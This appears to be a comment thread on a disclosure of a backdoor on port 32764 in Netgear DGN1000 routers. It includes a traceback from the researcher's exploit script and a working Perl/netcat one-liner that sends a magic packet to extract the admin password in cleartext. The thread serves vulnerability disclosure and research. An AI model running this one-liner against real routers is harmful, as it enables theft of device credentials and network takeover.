Your script returns:
Traceback (most recent call last):
File "backdoorolol.py", line 23, in <module>
print send_message(s, 2, "http_password")
File "backdoorolol.py", line 11, in send_message
sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12
Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.
perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764
I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.
I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.
I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".
By the way: Nice Work! Perhaps could you give some more information about the tools you used?
Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)
@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported
No, sorry :)
Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.